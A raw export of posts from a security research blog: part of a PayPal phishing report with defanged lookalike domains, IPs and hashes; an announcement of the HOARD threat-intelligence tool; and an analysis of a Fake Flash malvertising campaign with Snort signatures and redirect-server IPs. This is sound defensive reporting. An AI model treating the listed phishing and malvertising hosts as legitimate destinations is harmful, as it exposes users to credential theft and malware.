<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">142.4.14<span style="white-space: normal;">[.]</span>169</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">3ef2bd65e746676d25e7d6e017b03cdb7b906e6de5559cffae43f03142617395</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Redirects</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t.co-d3gbfd<span style="white-space: normal;">[.]</span>city</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/tettew</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/shrt</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/_Ebfo0oe</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">xt<span style="white-space: normal;">[.]</span>lv/XJiEa</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">alif.idseedapp<span style="white-space: normal;">[.]</span>in</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/webappss</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">kuntulmaju<span style="white-space: normal;">[.]</span>ml/cuk </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">huit<span style="white-space: normal;">[.]</span>re/satumilyar</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">1.googleincsafe<span style="white-space: normal;">[.]</span>org/brinjilan</span></span></div>
<div>
<br /></div>
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>DeepEnd Research has already notified Apple and PayPal of these findings prior to the publication of this post.</b></span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><b><u>7/27 - Update:</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;"><b><u><br /></u></b></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since the publication of our blog post the Twitter accounts we found along with the </span><span style="font-family: "arial" , "helvetica" , sans-serif;">associated </span><span style="font-family: "arial" , "helvetica" , sans-serif;">YouTube </span><span style="font-family: "arial" , "helvetica" , sans-serif;">account </span><span style="font-family: "arial" , "helvetica" , sans-serif;">have been suspended from each respected platform.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">During this time we were also continuing to monitor for any renewed activity by any new users possibly using the same methods outlined in this campaign, since the identified ones were suspended.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">We managed to find that there is currently one newly registered Twitter user still using the same construct of various shortened links leading to PayPal login phishing pages:</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br />This user is registered under the name 'Tanya D Campero' - https://twitter.com/CamperoTanya </span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><u>The links tweeted out by this user lead us to the following new websites and infrastructure used by this campaign:</u></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">iiri[.]ir/MtgOi</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">x[.]co/6nJpF </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">x[.]co/cuents8592</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">sku[.]su/bZUVw</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">pavpal[.]com-appverifyaccount[.]me</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-webappsactivityaccount[.]</span><span style="font-family: "arial" , "helvetica" , sans-serif;">support</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-appaccountverify[.]me</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">162.144.78[.]12</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-verifyidseed[.]net</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-accounts-verification[.]online</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pavpal[.]com-disputeaccount[.]me</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">22027bb7a536c4631d05950c052600da4e4e6b697c0ffee2189da38e05857466</span></div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
</div>
Andrei Kornevhttp://www.blogger.com/profile/11381063307200503085noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-18015918082331351182018-06-24T12:27:00.000-04:002018-06-24T12:35:43.098-04:00HOARD Concept Release<!--StartFragment-->
<br />
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;">Introducing
"Historical Observations of Actionable Reputation Data" (HOARD) - a
new proof of concept that we've designed to help security defenders utilize
Threat Intelligence (Observable and Indicator data) in new ways. We understand
that there are a number of ways to address this challenge. The goal is not to
come up with the next "Product X" - but to bring awareness to another
use of threat intelligence (or reputation data). </span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;">Observable data is
frequently identified by computer security devices, intrusion detection
systems, and forensic investigators following an intrusion or other malicious
event. When observable data is paired with contextual information it becomes an
indicator. Indicators are usually given a reputation or risk score.</span></div>
<div style="font-size: 11pt; margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">These Indicators are frequently classified with
the industry term "threat Intelligence" and disseminated by both
humans and machines to alert computer security teams about threats they may
have been previously unaware of.<span style="mso-spacerun: yes;"> </span>STIX is
a standard that is commonly used to communicate this type of data and inject it
into security device pipelines. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Many computer security technologies will import
this threat intelligence data and match it with same type observables. This has
been done through Security Incident and Event Monitoring (SIEM) solutions,
antivirus and network or system level intrusion detection systems.
Unfortunately, most of this searching is forward focused.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">The issue with forward focused analysis of
indicators is the ephemeral nature.<span style="mso-spacerun: yes;"> </span>Once
identified, an adversary may change their attack profile and in doing so they
change the identified observables. This asserts that even the fastest sharing
platforms are likely to become less effective in the hours to days following
the initial discovery of a given observable.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">HOARD aims to reduce the speed and storage
limitations needed for quickly matching observable data with historical
threats.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Once installed, the HOARD application will
monitor log events in real time by monitoring a queuing system (Currently
Redis) fed by RSYSLOG, Suricata or other technologies. Since context is not
required for the initial searches, the application extracts and stores only the
observable data identified by the analyst as being relevant. This immediately
reduces the data stored to a manageable size and provides raw data that can be
indexed in a probabilistic data structure known as sketches or Cuckoo Filters.</span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Once observable data has been added to a threat
intelligence exchange platform or a security team has been alerted to an
issue,<span style="mso-spacerun: yes;"> </span>a second application can be
utilized to rapidly search back in time by querying the sketches to determine
if the observable was probably seen in the past. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">When a probabilistic match has been identified,
the organizations Security Incident and Event Monitor (SIEM) is queried using
the file date and timestamp information, this second query is used to validate
the hit and provide context. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Keeping in mind cuckoo filters are
probabilistic in nature, there will be false positives, but never false
negatives. This rapid searching capability should be used to narrow down the
potential timeframes at issue rather than relying on trigram or full context
searches through an already taxed SIEM product. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">Furthermore, these cuckoo filters/sketches can
be provided to external organizations such as MSSPs, Incident Responders or Law
Enforcement without exposing any organization or sensitive data. </span></div>
<div style="font-size: 12pt; margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;">HOARD is open source, GPLv3. We are releasing
our operational POC in hopes that it will spark ideas and discussion among the
security community. Our goal is implementation in a wide variety of products to
continue to advance the future of threat intelligence and behavior or
reputation matching on observable data.<span style="mso-spacerun: yes;"> </span></span></div>
<div style="margin-bottom: 12pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="font-size: 12.0pt;">Please head on over to our GitHub repo (</span><a href="https://github.com/deependresearch/hoard"><span style="font-size: 11.0pt;">https://github.com/deependresearch/hoard</span></a><span style="font-size: 11.0pt;">)</span><span style="font-size: 12.0pt;"> to take a look at our POC. </span></span></div>
<!--EndFragment--><br />Anonymoushttp://www.blogger.com/profile/06184797257846704907noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-4526877325835571262018-02-20T16:07:00.000-05:002018-02-20T16:07:04.506-05:00YAFF - Yet Another Fake Flash campaign<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b><u>By Andre' DiMino and Mila Parkour</u></b><br />
<br />
At this point in Internet history, the prevalence of "Fake Flash" sites is certainly nothing new.<br />
These Fake Flash sites attempt to trick a user into installing what they believe is an update to Adobe Flash. In reality, this "update" is a malicious payload that will compromise their computer.<br />
<br />
A typical Fake Flash infection involves a malicious or compromised web site or embedded advertisement that redirects the user to a page indicating that the user's Adobe Flash player is out of date.<br />
In some cases, there are several series of redirects until the final landing page is hit by the user.<br />
This landing page typically is some variation of Figure 1 below.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwk8FZk8eYmTyMZl5W9h2-je_c59WBgnJ3bhGYz20SQ0C5SO2OXUW472aCUy1ojfTgOXrExcaj4aKKtqmG9RczVH1MSKrqqobZhVjker23E62AWOJFHkLTJRqlgZS8vGcit9uesRIB27k/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="862" data-original-width="1193" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwk8FZk8eYmTyMZl5W9h2-je_c59WBgnJ3bhGYz20SQ0C5SO2OXUW472aCUy1ojfTgOXrExcaj4aKKtqmG9RczVH1MSKrqqobZhVjker23E62AWOJFHkLTJRqlgZS8vGcit9uesRIB27k/s640/2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Typical Fake Flash update page</td></tr>
</tbody></table>
<br />
<br />
The trusting user, (who is super eager to watch their Flash content) then clicks the update link at which point the malware is downloaded to the user's computer. Many varieties of malware, including ransomware and banking trojans have been delivered this way.<br />
Most Fake Flash campaigns are initiated via advertising networks on sites that require Flash to view their content such as streaming movie sites and online games.<br />
<br />
So while we don't want to re-hash old news and analysis of FakeFlash, we do wish to raise awareness of a very aggressive FakeFlash/malvertising campaign.<br />
We also wished to provide some IOCs associated with this campaign.<br />
<br />
A heavy wave of Fake Flash redirects appeared on our radar. Literally hundreds of redirects were seen from assorted domains, all with similar network traffic patterns.<br />
Most all of these were associated with advertising redirects from online video streaming sites.<br />
The landing page for these redirects were seen as either fake flash, Amazon gift card, or other malvertising type sites.<br />
<br />
Tracing back the network traffic from the Fake Flash landing pages provided information on the redirections.<br />
For example, the following images represent a typical redirection chain that we observed.<br />
We are using <a href="https://github.com/omriher/CapTipper" target="_blank">CapTipper</a> to present the HTTP sessions for the images.<br />
Starting from the landing page and working up the chain:<br />
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_AbvXcpQ7t28lIQIZX1Rp4jZ_Eg_f1E0VFOYxOQK_rBWuz1Tp8Y7_E0sEjItJ9myYw0pUBxI9Y2RzjrFlQKstOy1Tit27gbR7nQHR4OwwQ3yiZ3FHwwfd6uQYt3vh8nmckXym8W2S1ak/s1600/srv79.admedit.net_redirect_3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="804" data-original-width="1600" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_AbvXcpQ7t28lIQIZX1Rp4jZ_Eg_f1E0VFOYxOQK_rBWuz1Tp8Y7_E0sEjItJ9myYw0pUBxI9Y2RzjrFlQKstOy1Tit27gbR7nQHR4OwwQ3yiZ3FHwwfd6uQYt3vh8nmckXym8W2S1ak/s640/srv79.admedit.net_redirect_3.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Landing page for one redirect chain observed.</td></tr>
</tbody></table>
<br />
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFLSqpNYl9K8N0uNBgdAJ9GgncsemKggAGLhcbeJyFPTdp3Dyh5URGwDheRSr4gvbTQ4GkmRCc_BVoCvrBk7rTkPDFP96zJsY-q8n1jfrGcdObtDJmQyzXagYXQOi5hUuhQMfizh7pj4/s1600/srv79.admedit.net_redirect_2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="632" data-original-width="1600" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFLSqpNYl9K8N0uNBgdAJ9GgncsemKggAGLhcbeJyFPTdp3Dyh5URGwDheRSr4gvbTQ4GkmRCc_BVoCvrBk7rTkPDFP96zJsY-q8n1jfrGcdObtDJmQyzXagYXQOi5hUuhQMfizh7pj4/s640/srv79.admedit.net_redirect_2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Second redirect</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFFI4Ly26wshO55xijAs4HrBj53MbAS4McYNn58_d-BsE8AYDu41JtSWm2K4Rr2NbcjUHiBGif3cR6CZESqBOH7YB7kwaaiYrZHoWLt_Uc9Gm_M_MKij7hxg6Gjm3ucDuR6psQXMoFA8/s1600/srv79.admedit.net_redirect_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="619" data-original-width="1600" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghFFI4Ly26wshO55xijAs4HrBj53MbAS4McYNn58_d-BsE8AYDu41JtSWm2K4Rr2NbcjUHiBGif3cR6CZESqBOH7YB7kwaaiYrZHoWLt_Uc9Gm_M_MKij7hxg6Gjm3ucDuR6psQXMoFA8/s640/srv79.admedit.net_redirect_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First redirect</td></tr>
</tbody></table>
<br />
<div>
Again tracing backward through all the network traffic, piecing together all the redirects and HTTP <a href="https://en.wikipedia.org/wiki/HTTP_referer" target="_blank">referer</a> fields, we observed what appears to be the source for these malvertising redirects.</div>
<div>
<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY7FZePtyi74sJC1J5sX59zBFknpzCZgQc_PAl4g979U1Gt3VX6ZeZeZ968D8Sei8vE7XPG-sqGt-3_Ij_XRLjx_By7ivgtHRnKViCHGGiYTsHcFlnxdZDYDyEc0uWjxXQOgrnkIauvEg/s1600/adsb4track.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="747" data-original-width="1600" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY7FZePtyi74sJC1J5sX59zBFknpzCZgQc_PAl4g979U1Gt3VX6ZeZeZ968D8Sei8vE7XPG-sqGt-3_Ij_XRLjx_By7ivgtHRnKViCHGGiYTsHcFlnxdZDYDyEc0uWjxXQOgrnkIauvEg/s640/adsb4track.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
Note that a video from a streaming video website was the Referer in a GET request to jwljj.adsb4track[.]com. In almost every instance that we looked at, jwljj.adsb4track[.]com would redirect the browser to one of several domains. In the example above, the user was directed to srv79.admedit[.]net, which then continued the redirection as seen in the "First redirect" image above.</div>
<div>
<br />
Other initial redirect domains seen are listed below.<br />
<br /></div>
<div>
We also noted that for browsing sessions that were not redirected to a fake flash site, the redirection was sent to a page on the domain bestabid[.]com. This page would redirect the browser to some malvertising, phish, or other traffic monetizing site.<br />
<br />
For example, one redirect to the bestabid[.]com page yielded this HTML code:</div>
<div>
<br /></div>
</div>
<div>
<a href="http://files.deependresearch.org/resources/7fr0zswemk32_bestabid.txt" target="_blank">Example of flash detect and redirect from bestabid[.]com</a><br />
Note the tracking beacons at<br />mt.rtmark[.]net and my.rtmark[.]net<br />
<br /></div>
<div>
So since we've seen so many of these, we thought it would just be best to post some Snort signatures and IOCs associated with this campaign.<br />
<div>
<br /></div>
<div>
<b><u>Snort Signatures</u></b></div>
<div>
<br />
The following Snort signatures will help detect the redirects seen in this campaign<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"BestaBid FakeFlash Redirect 1"; content:"Location"; http_header; fast_pattern:only; content:"302"; http_stat_code; pcre:"/\/\?pcl=[a-zA-Z0-9_-]{86}\x2E\x2E\&cid=/i"; classtype:unknown; sid:xxxxx; rev:1; )</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"BestaBid FakeFlash Redirect 2"; content:"Location"; http_header; fast_pattern:only; content:"302"; http_stat_code; pcre:"/\/\?pcl=[a-zA-Z0-9_-]{43}\x2E\&cid=/xxi"; classtype:unknown; sid:xxxxx; rev:1; )</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<b><u>Initial Redirect Domains & IP addresses</u></b><br />
<br />
<a href="http://files.deependresearch.org/resources/7si9439_34.194.20.115.txt" target="_blank">jwljj.adsb4track[.]com - 34.194.20.115 - Amazon AWS</a><br />
<a href="http://files.deependresearch.org/resources/9b59a20_54.164.252.255.txt" target="_blank">winclicks[.]info - 54.164.252.255 - Amazon AWS</a><br />
<br />
<b><u>Secondary Redirects</u></b><br />
<b><u><br /></u></b>
<a href="http://files.deependresearch.org/resources/y73nc02_212.129.56.50.txt" target="_blank">212.129.56.50 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/9de48bt_195.154.102.90.txt" target="_blank">195.154.102.90 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/77vr4mu_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/r90s38n_34.236.112.82.txt" target="_blank">34.236.112.82 - Amazon AWS</a><br />
<a href="http://files.deependresearch.org/resources/42mfpoe_5.8.35.154.txt" target="_blank">5.8.35.154 - LLHost Inc</a><br />
<a href="http://files.deependresearch.org/resources/aqplor5_163.172.21.184.txt" target="_blank">163.172.21.184 - - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/vo58s20_5.39.223.144.txt" target="_blank">5.39.223.144 - Hostkey B.V</a><br />
<a href="http://files.deependresearch.org/resources/653nto9_5.39.223.145.txt" target="_blank">5.39.223.145 - Hostkey B.V</a><br />
<a href="http://files.deependresearch.org/resources/v954n22_162.255.117.132.txt" target="_blank">162.255.117.132 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/58sw20m_163.172.113.205.txt" target="_blank">163.172.113.205 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/c9550xp_163.172.197.138.txt" target="_blank">163.172.197.138 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/v9440hi_163.172.197.160.txt" target="_blank">163.172.197.160 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/xo9x48v_195.154.44.206.txt" target="_blank">195.154.44.206 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ngtguup_198.187.28.7.txt" target="_blank">198.187.28.7 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/ngtludn_212.83.133.129.txt" target="_blank">212.83.133.129 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ngtraad_212.83.137.0.txt" target="_blank">212.83.137.0 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/773nxp9_212.129.49.120.txt" target="_blank">212.129.49.120 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/45bt8sw_212.129.50.104.txt" target="_blank">212.129.50.104 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/zwebc98_212.129.51.188.txt" target="_blank">212.129.51.188 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/678de3m_212.129.53.8.txt" target="_blank">212.129.53.8 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/112nt9v_212.129.53.77.txt" target="_blank">212.129.53.77 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/c9ir57n_212.129.54.29.txt" target="_blank">212.129.54.29 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/sxrb755_212.129.56.97.txt" target="_blank">212.129.56.97 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/5900mro_212.129.56.205.txt" target="_blank">212.129.56.205 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/2600kwl_212.129.62.255.txt" target="_blank">212.129.62.255 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/29de48b_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ightyft_162.255.117.134.txt" target="_blank">162.255.117.134 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/oltyol8_212.83.133.112.txt" target="_blank">212.83.133.112 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/edruju4_163.172.199.130.txt" target="_blank">163.172.199.130 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/x475ntg_212.83.167.169.txt" target="_blank">212.83.167.169 - Iliad / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/787nfru_163.172.198.43.txt" target="_blank">163.172.198.43 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/3edc90g_163.172.198.44.txt" target="_blank">163.172.198.44 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/48i8l90_163.172.81.70.txt" target="_blank">163.172.81.70 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/hgjt85m_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/209crrfp_162.255.117.134.txt" target="_blank">162.255.117.134 - Namecheap, Inc.</a><br />
<a href="http://files.deependresearch.org/resources/10m0qsi_195.154.49.202.txt" target="_blank">195.154.49.202 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ve9a28v_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/d458cv0_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
185.176.192.107 - Histate Global<br />
<br />
<b><u>Redirects to landing pages</u></b><br />
<br />
The landing page redirects were seen hosted on:<br />
<br />
<a href="http://files.deependresearch.org/resources/10m0qsi_195.154.49.202.txt" target="_blank">195.154.49.202 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/ve9a28v_195.154.50.203.txt" target="_blank">195.154.50.203 - Online SAS / Poneytelecom.eu</a><br />
<a href="http://files.deependresearch.org/resources/d458cv0_195.154.36.167.txt" target="_blank">195.154.36.167 - Online SAS / Poneytelecom.eu</a><br />
<br />
<br />
<b><u>Passive DNS</u></b><br />
<i><a href="https://help.passivetotal.org/passive_dns.html" target="_blank">Passive DNS</a> information courtesy of <a href="https://www.farsightsecurity.com/" target="_blank">Farsight Security, Inc.</a></i><br />
<br />
We've identified many many thousands of domains associated with this campaign.<br />The pDNS results above gives a good indication of the scope and scale of the infrastructure used for this campaign.<br />
<br />
Click the above links for a text file containing the Passive DNS information for the listed IP addresses.<br />
<br />
<div style="text-align: center;">
<u>Many thanks to Andrei Kornev for his research assistance.</u></div>
<br /></div>
</div>
</div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-20700218406167880432017-03-20T00:03:00.000-04:002018-09-05T23:27:44.554-04:00Analysis of Trump's secret server story<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
